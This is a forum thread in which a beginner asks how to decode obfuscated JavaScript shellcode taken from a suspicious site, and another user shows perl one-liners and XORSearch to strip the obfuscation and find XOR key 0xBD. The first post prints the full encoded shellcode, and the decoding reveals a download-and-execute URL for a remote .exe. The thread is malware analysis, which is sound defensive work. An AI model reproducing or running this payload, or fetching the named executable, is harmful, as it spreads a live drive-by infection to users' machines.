Please help me with this Shellcode

[kristofer_nolen]

Hello,

My name is kris. I am newbie to analyzing malicious Java scripts. Recently i got an obfuscated shell code which is difficult to decrypt. Please see the shell code below.

%u5858%u5858%u10EB%u4B5B%uC'+'933%uB96'+'6%u03B8%u34'+'80%uBD0B%uFA'+'E2%u05E'+'B%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D'+'2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCE'+'D5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uED'+'BD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB'+'FBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB'+'8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4'+'136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2A'+'D8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA66'+'9%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D'+'7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ud4c5%u8fd3%u8988%u8e88%u938b%u8e8e%u8f8f%ud293%udacf%u8587%u9284%u85c5%ud893%ud8c5%ubdbd%ubdbd%uEAEA%uEAEA%uEAEA%uEAEA

I got this from one website which made me to feel suspicious also I found the XOR key (189) and The exact malicious link where they are downloading through Jsunpack Site.

Can someone help me how to decrypt this through malzilla and help me how to find out the XOR key.

Step by Step explanation is much appreciated.

Thanks in Advance
Kris

[philipp]

Hi,
I cant help much with malzilla, but I will explain how I do it.

First thing to do is clean up the shellcode, removing quotes (hex 0x27 and 0x22) and plus signs:

Code: [Select]

$ perl -i -pe 's/[\x27\x22\+]//g' shellcode

Now convert it to its character representation:

Code: [Select]

$ cat shellcode | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > shellcode2

At this step I usually take a look at its hexdump, and would notice it might be xored.

There is an excellent program by Didier Stevens called XORSearch, which lets you search for a string to find the XOR key.
Get it at http://blog.didierstevens.com/programs/xorsearch/

So we are simply searching for the string 'http':

Code: [Select]

$ ./xorsearch shellcode2 http
Found XOR BD position 03A3: http://xin254536.3322.org:89/x8.exe

You can now either use the -s switch of xorsearch to save an 'unxored' copy to disk, or use perl again

Code: [Select]

$ cat shellcode2 | perl -pe 's/(.)/chr(ord($1)^0xBD)/ge' > shellcode3

All this is possible on windows too.

Regards,
Philipp

[kristofer_nolen]

Hi Philipp,

Thanks for your prompt reply. are these commands perl based?

could you please let me know how to use this and where to download, so that i could install and learn about this tool.

Also, could you please explain me what are all the other tools needed to analyze Shellcode through this application.

Your advise on this is much appreciated

Thanks once again
a newbie kris

[philipp]

Hi kris,

Perl is not a program, its a programming language that you can also use on the commandline to do certain tasks.
Learn about it here: http://www.perl.org/

The commands I posted should work on windows too, with the exception of the 'cat' command (dump content of a file to screen). I am not sures, but I think the Windows command 'type' is an alternative
The other tool 'xorsearch' is also freely available, even as a precompiled windows binary at http://blog.didierstevens.com/programs/xorsearch/

Now the question is, if you really want to go install and learn perl or just use web services like jsunpack that are doing a wonderful job too

Regards,
ph